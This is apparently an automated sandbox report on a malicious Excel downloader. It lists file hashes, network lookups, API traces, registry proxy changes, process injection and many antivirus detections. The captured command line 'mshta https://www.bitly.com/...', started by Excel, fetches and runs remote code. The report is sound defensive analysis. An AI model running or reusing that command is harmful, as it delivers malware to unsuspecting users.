Summary | ZeroBOX

BHBW-P412536.xls

AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6402 Sept. 2, 2021, 6:14 p.m. Sept. 2, 2021, 6:17 p.m.
Size 128.9KB
Type Microsoft Excel 2007+
MD5 1963a4808a9d94fbc0e380707c150730
SHA256 352767d770508167e0b3e35ff366d2ccb331ab7ab1bff8dedca0086086bc0f39
CRC32 74633ED3
ssdeep 3072:6bhM5LF0dBFIFtkmT+XK5ESRrOLhb7BLVYMiO5:eybXkmiGxOLhnBhY9o
Yara None matched

Name Response Post-Analysis Lookup
www.bitly.com
CNAME bitly.com
67.199.248.15
IP Address Status Action
164.124.101.2 Active Moloch
67.199.248.14 Active Moloch

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b553000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0765f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0765f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005c0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005c0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005c0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005c0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005c0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005c0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x709f2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b553000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$BHBW-P412536.xls
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000414
filepath: C:\Users\test22\AppData\Local\Temp\~$BHBW-P412536.xls
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$BHBW-P412536.xls
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline mshta https://www.bitly.com/ewrhteraewkjsi
cmdline "C:\Windows\System32\mshta.exe" https://www.bitly.com/ewrhteraewkjsi
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2848
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002a0
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002a0
regkey_r: ProxyOverride
reg_type: 1 (REG_SZ)
value: 127.0.0.1:16107;
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
1 0 0
parent_process excel.exe martian_process mshta https://www.bitly.com/ewrhteraewkjsi
parent_process excel.exe martian_process "C:\Windows\System32\mshta.exe" https://www.bitly.com/ewrhteraewkjsi
Process injection Process 1960 resumed a thread in remote process 2848
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000608
suspend_count: 1
process_identifier: 2848
1 0 0
Lionic Trojan.Script.Generic.a!c
Elastic malicious (high confidence)
Alibaba TrojanDownloader:Office97/Powdow.83d3d90c
Cyren PP97M/Agent.ACM.gen!Eldorado
Symantec Trojan.Mdropper
ESET-NOD32 a variant of Generik.LIMOBDO
Avast Script:SNH-gen [Trj]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.37519231
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
MicroWorld-eScan Trojan.GenericKD.37519231
Ad-Aware Trojan.GenericKD.37519231
McAfee-GW-Edition W97M/Downloader.drf
FireEye Trojan.GenericKD.37519231
Emsisoft Trojan.GenericKD.37519231 (B)
SentinelOne Static AI - Suspicious OPENXML
GData Macro.Trojan.Agent.RR1MOO
Avira HEUR/Macro.Downloader.MRKI.Gen
Microsoft TrojanDownloader:O97M/Powdow.RVO!MTB
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
McAfee W97M/Downloader.drf
MAX malware (ai score=87)
Ikarus Trojan-Downloader.VBA.Agent
Fortinet VBA/Agent.F37B!tr
AVG Script:SNH-gen [Trj]
file C:\Windows\System32\mshta.exe